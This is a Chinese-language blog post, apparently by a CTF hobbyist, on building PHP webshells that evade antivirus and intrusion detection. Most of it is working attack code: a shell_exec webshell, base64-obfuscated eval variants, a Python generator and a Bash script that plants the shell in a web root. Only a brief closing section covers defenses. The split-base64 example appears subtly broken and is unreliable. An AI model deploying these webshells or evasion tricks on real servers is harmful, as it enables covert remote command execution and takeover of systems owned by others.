0x01 攻击板块

Webshell免杀技术是一个在攻防领域备受关注的话题。这篇文章将深入探讨如何在实际环境中使用Python和Bash工具构建免杀Webshell，从而避开常见的安全检测机制。本内容仅限授权安全测试使用，旨在帮助安全研究人员掌握相关技术。

现代Web应用架构通常由前端UI、中间层应用逻辑，以及后端数据库组成。这也意味着攻击者有多种途径插入恶意代码，包括上传功能、输入框、API调用等。我们将从Webshell的基本构造开始，展示如何将其包装成看似无害的代码片段，绕过入侵检测和防病毒软件。

代码注入的秘密

Webshell通常被植入服务器端脚本中，可以用来执行任意命令、获取敏感数据，甚至控制服务器。以下是一个简单的PHP Webshell示例：

<pre><code class="language-php">&lt;?php echo shell_exec($_GET[&#039;cmd&#039;]); ?&gt;</code></pre>

为了避免被直接检测，攻击者常常会采用混淆技术。首先，我们可以尝试将Webshell代码分割并使用各种编码方式进行混淆，比如base64编码。

<pre><code class="language-php">&lt;?php eval(base64_decode(&#039;ZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7&#039;)); ?&gt;</code></pre>

这种方法虽然可以简单地绕过某些静态检测，但面对动态分析或高级EDR时仍不够。接下来，我们将介绍如何使用Python和Bash进行进一步的免杀操作。

环境搭建，玩转工具

在开始动手之前，我们需要一个安全的实验环境。推荐使用虚拟机或Docker容器来模拟攻击场景。以下是一个简单的搭建流程：

使用Docker构建测试环境

1. 安装Docker：确保你的系统上已经安装了Docker和Docker Compose。
2. 获取基本镜像：我们选择一个常用的PHP+MySQL配置作为基础。

<pre><code class="language-bash"># Dockerfile FROM php:7.4-apache RUN docker-php-ext-install mysqli COPY src/ /var/www/html/</code></pre>

1. 启动服务：

<pre><code class="language-bash">docker build -t webshell-testing . docker run -d -p 8080:80 webshell-testing</code></pre>

这套环境可以让你迅速验证免杀Webshell的效果。

玩转Payload构造

在隐藏Webshell时，攻击者可以利用Payload构造的艺术来混淆恶意代码。这里我们将使用Python和Bash来实现一个动态生成和加载的Webshell。

Python动态生成Webshell

Python能很好地完成字符串处理和编码，我们可以用它来生成复杂的Webshell代码：

<pre><code class="language-python">import base64

原始Webshell代码

webshell_code = &quot;&lt;?php echo shell_exec($_GET[&#039;cmd&#039;]); ?&gt;&quot;

使用base64进行编码

encoded_shell = base64.b64encode(webshell_code.encode()).decode()

构造带解码逻辑的PHP代码

php_code = f&quot;&lt;?php eval(base64_decode(&#039;{encoded_shell}&#039;)); ?&gt;&quot;

写入文件

with open(&#039;webshell.php&#039;, &#039;w&#039;) as f: f.write(php_code)

print(&quot;Webshell 已生成并编码&quot;)</code></pre>

通过这种动态生成方式，攻击者可以轻松地生成不同类型的Webshell，并通过不同的编码方式进一步隐藏其本质。

Bash实现临时加载

Bash脚本可以执行系统命令，并调用其他脚本工具进行免杀操作：

<pre><code class="language-bash">#!/bin/bash

在目标目录下创建 Webshell

echo &quot;&lt;?php eval(base64_decode(&#039;ZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7&#039;)); ?&gt;&quot; &gt; /var/www/html/safe_shell.php

设置权限

chmod 644 /var/www/html/safe_shell.php

echo &quot;Webshell 已创建，并设置为安全权限&quot;</code></pre>

这种方法使得攻击者可以迅速部署Webshell，并对其进行权限设置以避免被检测。

神秘的免杀技巧

绕过检测主要有几种常见的方法，例如代码混淆、动态加载、以及流量伪装。我们将逐一进行分析：

混淆与动态加载

第一步是使用混淆技术，使Webshell代码不容易被静态分析工具识别。比如，使用base64、rot13等常见编码方法。注意：这些方法仅适用于初级检测。

更高级的手法是利用动态加载技术，将Webshell代码拆分为多段，只有在特定条件下才会组合成完整代码并执行。

<pre><code class="language-php">&lt;?php $part1 = base64_decode(&#039;ZWNobyBz&#039;); $part2 = base64_decode(&#039;aGVsbF9leGVjK&#039;); $part3 = base64_decode(&#039;CRfR0VUWydjbWQnXSk7&#039;); eval($part1 . $part2 . $part3); ?&gt;</code></pre>

流量伪装

攻击者可以通过伪装流量来避免被实时监控系统抓住。通常，攻击流量会被伪装成正常的Web请求，混杂在其他流量中。例如，使用普通的GET请求或隐藏恶意参数在POST数据中。

检测与防御，如何应对

虽然攻击手法层出不穷，检测与防御技术也在不断进步。以下是几种有效的防御策略：

动态分析

采用动态分析技术可以检测到混淆和动态加载的恶意代码。通过模拟真实用户行为来触发潜在的恶意代码，并进行行为分析。

文件监控

使用文件监控和完整性检查工具，可以及时发现未知文件或异常文件修改。结合白名单策略，只允许信任来源的脚本运行。

网络流量过滤

高级防火墙和IDS/IPS系统能够有效识别异常流量，并阻止潜在的攻击尝试。这些系统可以通过分析流量模式和请求特征来发现隐藏的威胁。

实战心得与经验

作为一名CTF爱好者，我在各类比赛中遇到过许多形形色色的Webshell。一个成功的Webshell不仅需要免杀技术，还要考虑其持久性和操控性。在实践中，时刻保持创新思维，尝试不同的编码混淆和加载方案，才能在激烈的攻防对抗中取得优势。

同时，了解最新的安全检测技术，能帮助我们准确评估免杀效果，从而更好地设计攻击和防御方案。希望大家在研究这些技术时，始终保持合法合规的原则，为网络安全的进步贡献自己的力量。